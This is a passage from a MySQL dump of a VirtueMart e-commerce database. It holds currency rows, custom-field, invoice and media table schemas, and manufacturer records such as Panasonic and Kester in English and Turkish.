króna','','ISK',352,0.00000,'kr','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(164,1,'Kazakhstani tenge','','KZT',398,0.00000,'лв','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(165,1,'Kyrgyzstani som','','KGS',417,0.00000,'лв','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(166,1,'Latvian lats','','LVL',428,0.00000,'Ls','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(167,1,'Lithuanian litas','','LTL',440,0.00000,'Lt','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(168,1,'Mexican peso','','MXN',484,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(169,1,'Moldovan leu','','MDL',498,0.00000,'L','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(170,1,'Namibian dollar','','NAD',516,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(171,1,'Nicaraguan córdoba','','NIO',558,0.00000,'C$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(172,1,'Ugandan shilling','','UGX',800,0.00000,'Sh','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(173,1,'Macedonian denar','','MKD',807,0.00000,'ден','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(174,1,'Uruguayan peso','','UYU',858,0.00000,'$','0','','','{symbol}number}','{symbol}{sign}{number}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(175,1,'Uzbekistani som','','UZS',860,0.00000,'лв','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(176,1,'Azerbaijani manat','','AZN',934,0.00000,'ман','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(177,1,'Ghanaian cedi','','GHS',936,0.00000,'₵','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(178,1,'Venezuelan bolívar','','VEF',937,0.00000,'Bs','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(179,1,'Sudanese pound','','SDG',938,0.00000,'£','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(180,1,'Uruguay Peso','','UYI',940,0.00000,'UYI','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(181,1,'Mozambican metical','','MZN',943,0.00000,'MT','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(182,1,'WIR Euro','','CHE',947,0.00000,'€','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(183,1,'WIR Franc','','CHW',948,0.00000,'CHW','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(184,1,'Central African CFA franc','','XAF',950,0.00000,'Fr','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(185,1,'East Caribbean dollar','','XCD',951,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(186,1,'West African CFA franc','','XOF',952,0.00000,'Fr','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(187,1,'CFP franc','','XPF',953,0.00000,'Fr','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(188,1,'Surinamese dollar','','SRD',968,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(189,1,'Malagasy ariary','','MGA',969,0.00000,'MGA','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(190,1,'Unidad de Valor Real','','COU',970,0.00000,'COU','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(191,1,'Afghan afghani','','AFN',971,0.00000,'؋','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(192,1,'Tajikistani somoni','','TJS',972,0.00000,'ЅМ','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(193,1,'Angolan kwanza','','AOA',973,0.00000,'Kz','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(194,1,'Belarusian ruble','','BYR',974,0.00000,'p.','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(195,1,'Bulgarian lev','','BGN',975,0.00000,'лв','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(196,1,'Congolese franc','','CDF',976,0.00000,'Fr','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(197,1,'Bosnia and Herzegovina convert','','BAM',977,0.00000,'KM','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(198,1,'Mexican Unid','','MXV',979,0.00000,'MXV','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(199,1,'Ukrainian hryvnia','','UAH',980,0.00000,'₴','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(200,1,'Georgian lari','','GEL',981,0.00000,'ლ','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(201,1,'Mvdol','','BOV',984,0.00000,'BOV','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_currencies` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_customs`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_customs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_customs` (
  `virtuemart_custom_id` int unsigned NOT NULL AUTO_INCREMENT,
  `custom_parent_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_vendor_id` int unsigned NOT NULL DEFAULT '1',
  `custom_jplugin_id` int NOT NULL DEFAULT '0',
  `custom_element` varchar(50) NOT NULL DEFAULT '',
  `admin_only` tinyint(1) NOT NULL DEFAULT '0' COMMENT '1:Display in admin only',
  `custom_title` varchar(255) NOT NULL DEFAULT '' COMMENT 'FIELD TITLE',
  `show_title` tinyint(1) NOT NULL DEFAULT '1',
  `custom_tip` varchar(255) NOT NULL DEFAULT '' COMMENT 'TIP',
  `custom_value` varchar(4095) DEFAULT NULL COMMENT 'DEFAULT VALUE',
  `custom_desc` varchar(4095) DEFAULT NULL COMMENT 'DESCRIPTION OR UNIT',
  `field_type` varchar(2) NOT NULL DEFAULT '0' COMMENT 'S:STRING,I:INT,P:PARENT, B:BOOL,D:DATE,T:TIME,H:HIDDEN',
  `is_list` tinyint(1) NOT NULL DEFAULT '0' COMMENT 'list of values',
  `is_hidden` tinyint(1) NOT NULL DEFAULT '0' COMMENT '1:hidden',
  `is_cart_attribute` tinyint(1) NOT NULL DEFAULT '0' COMMENT 'Add attributes to cart',
  `is_input` tinyint(1) NOT NULL DEFAULT '0' COMMENT 'Add input to cart',
  `searchable` tinyint(1) NOT NULL DEFAULT '0' COMMENT 'Available as search filter',
  `layout_pos` varchar(24) DEFAULT NULL COMMENT 'LAYOUT POSITION',
  `custom_params` text NOT NULL,
  `virtuemart_shoppergroup_id` varchar(255) NOT NULL,
  `shared` tinyint(1) NOT NULL DEFAULT '0' COMMENT 'valid for all vendors?',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_custom_id`),
  KEY `custom_parent_id` (`custom_parent_id`),
  KEY `virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `custom_element` (`custom_element`),
  KEY `field_type` (`field_type`),
  KEY `is_cart_attribute` (`is_cart_attribute`),
  KEY `is_input` (`is_input`),
  KEY `searchable` (`searchable`),
  KEY `shared` (`shared`),
  KEY `published` (`published`),
  KEY `ordering` (`ordering`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb3 COMMENT='custom fields definition';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_customs`
--

LOCK TABLES `fz6t4_virtuemart_customs` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_customs` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_customs` VALUES (1,0,1,0,'',0,'COM_VIRTUEMART_RELATED_PRODUCTS',1,'COM_VIRTUEMART_RELATED_PRODUCTS_TIP','related_products','COM_VIRTUEMART_RELATED_PRODUCTS_DESC','R',0,0,0,0,0,NULL,'','',0,1,'2011-05-25 21:52:43',62,0,'2011-05-25 21:52:43',62,'0000-00-00 00:00:00',0),(2,0,1,0,'',0,'COM_VIRTUEMART_RELATED_CATEGORIES',1,'COM_VIRTUEMART_RELATED_CATEGORIES_TIP','related_categories','COM_VIRTUEMART_RELATED_CATEGORIES_DESC','Z',0,0,0,0,0,NULL,'','',0,1,'0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(3,0,1,0,'0',0,'Katalog',1,'','','','R',0,0,0,0,0,'','waddtocart=\"0\"|wPrice=\"0\"|wImage=\"1\"|wDescr=\"0\"|width=\"\"|height=\"\"|','',0,1,'2020-11-26 06:23:59',676,0,'2020-11-26 06:25:27',676,'0000-00-00 00:00:00',0),(4,0,1,0,'0',0,'Catalog',1,'','','','S',0,0,0,0,0,'','addEmpty=0|selectType=0|multiplyPrice=\"\"|transform=\"\"|','',0,1,'2020-11-26 06:29:12',676,0,'2020-11-26 06:29:12',676,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_customs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_invoices`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_invoices`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_invoices` (
  `virtuemart_invoice_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` int unsigned NOT NULL DEFAULT '1',
  `virtuemart_order_id` int unsigned DEFAULT NULL,
  `invoice_number` varchar(64) DEFAULT NULL,
  `order_status` char(2) DEFAULT NULL,
  `xhtml` text,
  `o_hash` varchar(33) DEFAULT NULL,
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_invoice_id`),
  UNIQUE KEY `invoice_number` (`invoice_number`,`virtuemart_vendor_id`),
  KEY `virtuemart_order_id` (`virtuemart_order_id`),
  KEY `virtuemart_vendor_id` (`virtuemart_vendor_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='custom fields definition';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_invoices`
--

LOCK TABLES `fz6t4_virtuemart_invoices` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_invoices` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_invoices` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_manufacturer_medias`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_manufacturer_medias`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_manufacturer_medias` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_manufacturer_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_media_id` int unsigned NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `virtuemart_manufacturer_id` (`virtuemart_manufacturer_id`,`virtuemart_media_id`),
  KEY `ordering` (`ordering`)
) ENGINE=MyISAM AUTO_INCREMENT=13 DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_manufacturer_medias`
--

LOCK TABLES `fz6t4_virtuemart_manufacturer_medias` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_manufacturer_medias` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_manufacturer_medias` VALUES (10,2,53,1),(5,4,39,1),(4,3,38,1),(6,5,40,1),(7,6,41,1),(8,7,51,1),(9,1,52,1),(12,8,94,1);
/*!40000 ALTER TABLE `fz6t4_virtuemart_manufacturer_medias` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_manufacturercategories`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_manufacturercategories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_manufacturercategories` (
  `virtuemart_manufacturercategories_id` int unsigned NOT NULL AUTO_INCREMENT,
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_manufacturercategories_id`),
  KEY `published` (`published`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='Manufacturers are assigned to these categories';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_manufacturercategories`
--

LOCK TABLES `fz6t4_virtuemart_manufacturercategories` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_manufacturercategories` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_manufacturercategories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_manufacturercategories_en_gb`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_manufacturercategories_en_gb`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_manufacturercategories_en_gb` (
  `virtuemart_manufacturercategories_id` int unsigned NOT NULL,
  `mf_category_name` varchar(180) NOT NULL DEFAULT '',
  `mf_category_desc` varchar(19000) NOT NULL DEFAULT '',
  `slug` varchar(192) NOT NULL DEFAULT '',
  PRIMARY KEY (`virtuemart_manufacturercategories_id`),
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_manufacturercategories_en_gb`
--

LOCK TABLES `fz6t4_virtuemart_manufacturercategories_en_gb` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_manufacturercategories_en_gb` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_manufacturercategories_en_gb` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_manufacturercategories_tr_tr`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_manufacturercategories_tr_tr`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_manufacturercategories_tr_tr` (
  `virtuemart_manufacturercategories_id` int unsigned NOT NULL,
  `mf_category_name` varchar(180) NOT NULL DEFAULT '',
  `mf_category_desc` varchar(19000) NOT NULL DEFAULT '',
  `slug` varchar(192) NOT NULL DEFAULT '',
  PRIMARY KEY (`virtuemart_manufacturercategories_id`),
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_manufacturercategories_tr_tr`
--

LOCK TABLES `fz6t4_virtuemart_manufacturercategories_tr_tr` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_manufacturercategories_tr_tr` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_manufacturercategories_tr_tr` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_manufacturers`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_manufacturers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_manufacturers` (
  `virtuemart_manufacturer_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_manufacturercategories_id` int DEFAULT NULL,
  `metarobot` varchar(400) DEFAULT NULL,
  `metaauthor` varchar(400) DEFAULT NULL,
  `hits` int unsigned NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_manufacturer_id`),
  UNIQUE KEY `virtuemart_manufacturercategories_id` (`virtuemart_manufacturer_id`,`virtuemart_manufacturercategories_id`),
  KEY `published` (`published`)
) ENGINE=MyISAM AUTO_INCREMENT=9 DEFAULT CHARSET=utf8mb3 COMMENT='Manufacturers are those who deliver products';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_manufacturers`
--

LOCK TABLES `fz6t4_virtuemart_manufacturers` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_manufacturers` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_manufacturers` VALUES (1,0,'','',0,0,'2014-08-02 06:54:40',676,'2017-11-05 11:30:14',676,'0000-00-00 00:00:00',0),(2,0,NULL,NULL,0,0,'2014-08-02 06:57:15',676,'2014-08-02 09:25:33',676,'0000-00-00 00:00:00',0),(3,0,NULL,NULL,0,0,'2014-08-02 07:00:18',676,'2014-08-02 07:02:20',676,'0000-00-00 00:00:00',0),(4,0,NULL,NULL,0,1,'2014-08-02 07:05:31',676,'2014-08-02 07:05:51',676,'0000-00-00 00:00:00',0),(6,0,NULL,NULL,0,1,'2014-08-02 07:06:31',676,'2014-08-02 07:06:42',676,'0000-00-00 00:00:00',0),(7,0,'','',0,0,'2014-08-02 09:22:22',676,'2017-11-09 09:36:03',676,'0000-00-00 00:00:00',0),(8,0,'','',0,1,'2019-09-16 09:07:30',676,'2019-09-16 09:16:48',676,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_manufacturers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_manufacturers_en_gb`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_manufacturers_en_gb`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_manufacturers_en_gb` (
  `virtuemart_manufacturer_id` int unsigned NOT NULL,
  `mf_name` varchar(180) NOT NULL DEFAULT '',
  `mf_email` varchar(255) NOT NULL DEFAULT '',
  `mf_desc` varchar(19000) NOT NULL DEFAULT '',
  `mf_url` varchar(255) NOT NULL DEFAULT '',
  `metadesc` varchar(400) NOT NULL DEFAULT '',
  `metakey` varchar(400) NOT NULL DEFAULT '',
  `customtitle` varchar(255) NOT NULL DEFAULT '',
  `slug` varchar(192) NOT NULL DEFAULT '',
  PRIMARY KEY (`virtuemart_manufacturer_id`),
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_manufacturers_en_gb`
--

LOCK TABLES `fz6t4_virtuemart_manufacturers_en_gb` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_manufacturers_en_gb` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_manufacturers_en_gb` VALUES (1,'Panasonic','','','http://industry.panasonic.com','','','','panasonic'),(2,'Mirae','','','','','','','mirae'),(3,'Kester','','','http://www.kester.com','','','','kester'),(4,'DDM NOVASTAR','','','http://www.ddmnovastar.com','','','','ddm-novastar'),(6,'Tolo','','','','','','','tolo'),(7,'Aqueous','','','','','','','70aqueous'),(8,'3S Technologies','info@3s-technologies.com.tr','','www.3s-technologies.com.tr','','','','3s');
/*!40000 ALTER TABLE `fz6t4_virtuemart_manufacturers_en_gb` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_manufacturers_tr_tr`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_manufacturers_tr_tr`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_manufacturers_tr_tr` (
  `virtuemart_manufacturer_id` int unsigned NOT NULL,
  `mf_name` varchar(180) NOT NULL DEFAULT '',
  `mf_email` varchar(255) NOT NULL DEFAULT '',
  `mf_desc` varchar(19000) NOT NULL DEFAULT '',
  `mf_url` varchar(255) NOT NULL DEFAULT '',
  `metadesc` varchar(400) NOT NULL DEFAULT '',
  `metakey` varchar(400) NOT NULL DEFAULT '',
  `customtitle` varchar(255) NOT NULL DEFAULT '',
  `slug` varchar(192) NOT NULL DEFAULT '',
  PRIMARY KEY (`virtuemart_manufacturer_id`),
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_manufacturers_tr_tr`
--

LOCK TABLES `fz6t4_virtuemart_manufacturers_tr_tr` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_manufacturers_tr_tr` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_manufacturers_tr_tr` VALUES (1,'Panasonic','','','http://industry.panasonic.com','','','','panasonic'),(2,'Mirae','','','http://www.mirae.com','','','','mirae'),(3,'Kester','','','http://www.kester.com','','','','kester'),(4,'DDM NOVASTAR','','','http://www.ddmnovastar.com','','','','ddm-novastar'),(6,'Tolo','','','','','','','tolo'),(7,'Aqueous','','','http://www.aqueoustech.com','','','','aqueous');
/*!40000 ALTER TABLE `fz6t4_virtuemart_manufacturers_tr_tr` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_medias`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_medias`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_medias` (
  `virtuemart_media_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` int unsigned NOT NULL DEFAULT '1',
  `file_title` varchar(126) NOT NULL DEFAULT '',
  `file_description` varchar(254) NOT NULL DEFAULT '',
  `file_meta` varchar(254) NOT NULL DEFAULT '',
  `file_class` varchar(64) NOT NULL DEFAULT '',
  `file_mimetype` varchar(64) NOT NULL DEFAULT '',
  `file_type` varchar(32) NOT NULL DEFAULT '',
  `file_url` varchar(900) NOT NULL DEFAULT '',
  `file_url_thumb` varchar(900) NOT NULL DEFAULT '',
  `file_is_product_image` tinyint(1) NOT NULL DEFAULT '0',
  `file_is_downloadable` tinyint(1) NOT NULL DEFAULT '0',
  `file_is_forSale` tinyint(1) NOT NULL DEFAULT '0',
  `file_params` varchar(12287) NOT NULL DEFAULT '',
  `file_lang` varchar(500) NOT NULL DEFAULT '',
  `shared` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_media_id`),
  KEY `virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `published` (`published`),
  KEY `file_type` (`file_type`),
  KEY `shared` (`shared`)
) ENGINE=MyISAM AUTO_INCREMENT=142 DEFAULT CHARSET=utf8mb3 COMMENT='Additional Images and Files which are assigned to products';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_medias`
--

LOCK TABLES `fz6t4_virtuemart_medias` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_medias` DISABLE KEYS */;
